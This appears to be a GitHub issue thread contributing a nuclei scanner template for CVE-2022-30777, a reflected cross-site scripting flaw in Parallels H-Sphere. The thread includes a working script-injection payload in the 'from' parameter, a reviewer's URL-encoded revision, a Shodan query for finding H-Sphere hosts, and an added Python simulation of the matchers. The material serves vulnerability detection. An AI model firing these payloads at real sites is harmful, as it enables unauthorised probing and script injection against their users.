CVE-2022-30777
3th1cyuk1 opened this issue
Yukesh kumar commented
Template Information:
Cross-site scripting (XSS) vulnerability in sites using outdated H-Sphere hosting allows remote attackers to inject arbitrary web script or HTML via the “from” parameter.
Nuclei Template:
id: CVE-2022-30777

info:
  name: Parallels H-Sphere
  author: 3th1c_yuk1
  severity: medium
  reference:
    - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index_en.php?from="><script>alert(1)</script>'
      - '{{BaseURL}}/index.php?from="><script>alert(1)</script>'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert(1)</script>"

      - type: word
        part: header
        words:
          - "text/html"
Ritik Chaddha commented
Hello @3th1cyuk1, to prevent getting FP, please update the template request and matcher as shown below. I have verified the template too.
requests:
  - method: GET
    path:
      - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
      - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<TITLE>"><script>alert(1)</script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
Also, update the metadata header:
metadata:
  verified: true
  shodan-query: title:"h-sphere"
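Added example, not part of the thread and not nuclei's own code: a simplified Python model of the word and status matchers, run against constructed responses, showing why the first matcher set can produce false positives while the revised set only fires on a 200 response with the payload reflected directly after `<TITLE>`. The response bodies and the names `matcher_hits`, `template_hits` and `compare` are assumptions made for illustration.

```python
# Added illustration: a simplified model of nuclei's word/status matchers.
# This is not nuclei's own code; all responses below are constructed samples.
PAYLOAD = '"><script>alert(1)</script>'

ORIGINAL = [  # matchers from the first template in the thread
    {"type": "word", "words": ["<script>alert(1)</script>"]},
    {"type": "word", "part": "header", "words": ["text/html"]},
]
REVISED = [  # matchers from the reviewed template
    {"type": "word", "words": ["<TITLE>" + PAYLOAD]},
    {"type": "word", "part": "header", "words": ["text/html"]},
    {"type": "status", "status": [200]},
]

HTML = "Content-Type: text/html; charset=UTF-8"
RESPONSES = {  # constructed, not captured from any real host
    "reflected_in_title": {
        "status": 200, "header": HTML,
        "body": "<HTML><HEAD><TITLE>" + PAYLOAD + "</TITLE></HEAD></HTML>"},
    "generic_404_echo": {
        "status": 404, "header": HTML,
        "body": "<html><body><h1>Not Found</h1><pre>/index.php?from="
                + PAYLOAD + "</pre></body></html>"},
    "encoded_reflection": {
        "status": 200, "header": HTML,
        "body": "<HTML><HEAD><TITLE>&quot;&gt;&lt;script&gt;alert(1)"
                "&lt;/script&gt;</TITLE></HEAD></HTML>"},
}

def matcher_hits(matcher, resp):
    """Evaluate one matcher; word lists are OR-ed, default part is the body."""
    if matcher["type"] == "status":
        return resp["status"] in matcher["status"]
    haystack = resp[matcher.get("part", "body")]
    return any(word in haystack for word in matcher["words"])

def template_hits(matchers, resp):
    """matchers-condition: and, so every matcher has to hit."""
    return all(matcher_hits(m, resp) for m in matchers)

def compare():
    """Map each sample to (original template hit, revised template hit)."""
    return {name: (template_hits(ORIGINAL, r), template_hits(REVISED, r))
            for name, r in RESPONSES.items()}

if __name__ == "__main__":
    for name, (old, new) in compare().items():
        print(f"{name:20} original={old!s:5} revised={new!s:5}")
```
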
Prince Chaddha commented
Hi @3th1cyuk1, thank you for taking the time to create this issue and contributing to this project 🍻